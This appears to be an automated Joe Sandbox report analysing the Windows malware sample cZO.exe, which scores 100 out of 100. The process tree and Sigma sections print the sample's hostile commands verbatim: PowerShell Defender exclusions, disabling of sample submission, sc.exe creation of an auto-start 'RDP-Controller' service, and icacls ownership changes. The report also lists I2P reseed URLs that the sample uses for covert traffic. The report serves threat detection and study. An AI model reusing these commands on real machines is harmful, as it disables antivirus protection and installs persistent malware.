Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cZO.exe

Overview

General Information

Sample name:cZO.exe
Analysis ID:1584500
MD5:be6e88537235ff3b6b61de70dfeecb3b
SHA1:4a622aa9cbbb7f66484734b85a211f20e0cb0edd
SHA256:bc1a44614123c841e31835919a21ed7322ea6537f6652f36d24fd7f83a440294
Tags:exeI2Parcaeuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Performs DNS queries to domains with low reputation
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
Uses TOR for connection hidding
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • cZO.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\cZO.exe" MD5: BE6E88537235FF3B6B61DE70DFEECB3B)
  • cZO.exe (PID: 5660 cmdline: C:\Users\user\Desktop\cZO.exe MD5: BE6E88537235FF3B6B61DE70DFEECB3B)
    • cmd.exe (PID: 6536 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7088 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6472 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 432 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • shdpeqdz2a54sj46ur0.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe" MD5: 2F829F1CB631D234C54F2E6C6F72EB57)
      • taskkill.exe (PID: 3652 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4324 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • main.exe (PID: 6524 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
          • WerFault.exe (PID: 5688 cmdline: C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • sc.exe (PID: 6448 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5880 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1716 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5308 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5492 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5548 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 4324 cmdline: C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 4124 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • main.exe (PID: 3688 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: BB070CFBD23A7BC6F2A0F8F6D167D207)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: sc.exe stop RDP-Controller, ParentImage: C:\Windows\System32\sc.exe, ParentProcessId: 4324, ParentProcessName: sc.exe, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 6524, ProcessName: main.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7088, ProcessName: powershell.exe
Sigma detected: Suspicious New Service Creation
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe, ParentProcessId: 7088, ParentProcessName: shdpeqdz2a54sj46ur0.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6448, ProcessName: sc.exe
Sigma detected: Suspicious Program Location with Network Connections
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 95.216.2.172, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 6524, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49856
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 432, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe, ParentProcessId: 7088, ParentProcessName: shdpeqdz2a54sj46ur0.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 6448, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6536, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 7088, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 5548, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://reseed.diva.exchange/b.cAvira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/i2pseeds.su3Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org:443/i2pseeds.su3Avira URL Cloud: Label: malware
Source: https://login.liveAvira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/P#Avira URL Cloud: Label: malware
Source: https://reseed.diva.exchange/Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/Avira URL Cloud: Label: malware
Source: https://reseed2.i2p.net/Avira URL Cloud: Label: malware
Source: https://reseed.i2pgit.org/i2pseeds.su30Avira URL Cloud: Label: malware
Source: https://netdb.i2p2.no/Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeAvira: detection malicious, Label: TR/AVI.Agent.jibab
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllReversingLabs: Detection: 26%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllReversingLabs: Detection: 31%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeReversingLabs: Detection: 69%
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeReversingLabs: Detection: 57%
Source: C:\Windows\Temp\I77yQ5inReversingLabs: Detection: 26%
Source: C:\Windows\Temp\YXkdIYk6ReversingLabs: Detection: 69%
Source: C:\Windows\Temp\YkhL6rehReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: cZO.exeVirustotal: Detection: 19%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeJoe Sandbox ML: detected

Compliance

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\cZO.exeUnpacked PE file: 0.2.cZO.exe.2510000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: Binary string: RfxVmt.pdb source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr
Source: Binary string: RfxVmt.pdbGCTL source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B915387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,22_2_00007FF8B91538C3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B915387F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FF8B915387F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B91538C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,32_2_00007FF8B91538C3
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF775723DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,6_2_00007FF775723DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE031CF3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF6BE031CF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BA4F4013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BA4F4013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,22_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B9156233 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B9156233
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8B918B333 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8B918B333
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BA504013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BA504013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB331F3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB331F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB55013 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB55013
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB857B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,32_2_00007FF8BFB857B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF6BE03737B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8B915A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8B9187DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BA4F967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB39BBB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB5A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]22_2_00007FF8BFB8293B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8B915A13B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8B9187DFB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8BA50967B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8BFB39BBB
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8BFB5A67B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 4x nop then lea r9, qword ptr [r8-01h]32_2_00007FF8BFB8293B

Networking

barindex
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 95.158.36.98 ports 0,1,2,30125,3,5
Source: global trafficTCP traffic: 107.189.28.6 ports 1,2,5,6,9,12596
Source: global trafficTCP traffic: 69.10.220.235 ports 19348,1,3,4,8,9
Source: global trafficTCP traffic: 78.191.208.199 ports 0,1,2,3,9,13920
Found Tor onion address
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000016.00000002.3157806335.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
